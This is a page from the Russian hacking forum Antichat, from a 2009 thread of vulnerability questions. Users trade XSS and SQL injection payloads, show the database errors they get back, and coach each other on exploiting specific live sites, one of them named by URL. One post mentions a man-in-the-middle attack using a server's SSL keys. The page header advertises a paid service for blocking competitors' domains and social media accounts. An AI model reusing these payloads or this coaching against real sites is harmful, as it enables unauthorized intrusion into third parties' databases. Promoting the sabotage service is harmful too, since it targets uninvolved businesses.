Форум АНТИЧАТ - Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 592 из 1393

592

Опции темы

Поиск в этой теме

Опции просмотра

#5911

12.03.2009, 00:35

Neoveneficus

Reservists Of Antichat - Level 6

Регистрация: 10.04.2008

Сообщений: 299

Провел на форуме:
1199829

Репутация: 405

Отправить сообщение для Neoveneficus с помощью ICQ

Цитата:

Сообщение от Велемир

/usr/local/apache/etc/ssl.all
Мб кто подскажет,что надо делать,какие проги нужны ?

Хм... А что ты собрался делать?

Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...

__________________
II venēficus, ī m.
(с лат.) волшебник, чародей

#5912

12.03.2009, 15:31

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

Провел на форуме:
140272

Репутация: 3

Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно -- ок

На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.

?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'

?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

#5913

12.03.2009, 15:42

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

Провел на форуме:
792994

Репутация: 104

Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

#5914

12.03.2009, 16:14

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

Провел на форуме:
140272

Репутация: 3

Цитата:

Сообщение от TreV@N

Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

здесь проблема в другом.
/* -- # без разници ошибка одна и таже.
как я понял тут только подзапросами можно.
но никак немогу и их использовать.

#5915

12.03.2009, 16:27

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

2 1west урлу в студию , поможем

#5916

12.03.2009, 18:08

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

Цитата:

select qnty_ from currency where crncy='('ok')' order by date_ desc limit 1

=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Цитата:

select qnty_ from currency where crncy='1' order by 1/* order by date_ desc limit 1

=> "через order+by показывает 1 поле."

Цитата:

select qnty_ from currency where crncy='1' union select 1/* order by date_ desc limit 1

mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

Цитата:

select qnty_ from currency where crncy='1' and (select 111)/* order by date_ desc limit 1

mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

хекерская догадка 45% (с)

#5917

12.03.2009, 19:37

IDW

Новичок

Регистрация: 08.09.2008

Сообщений: 21

Провел на форуме:
26253

Репутация: 7

Отправить сообщение для IDW с помощью ICQ

Код:

http://www.prazdnik.by/calendar/?day=-1%27

Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает

Код:

 [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]

#5918

12.03.2009, 19:40

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

Кавычки слешируються
'-1\\''))
фигасе запрос, походу автоматом(аля ORM-генерация) формируеться.

Последний раз редактировалось AkyHa_MaTaTa; 12.03.2009 в 19:53..

#5919

12.03.2009, 19:44

IDW

Новичок

Регистрация: 08.09.2008

Сообщений: 21

Провел на форуме:
26253

Репутация: 7

т.е. нельзя инъекцию провести?

#5920

12.03.2009, 19:50

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Можно, просто внимательно читай, что про синтаксис пишется.

Последний раз редактировалось R1dex; 12.03.2009 в 19:54..

Страница 592 из 1393

592

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход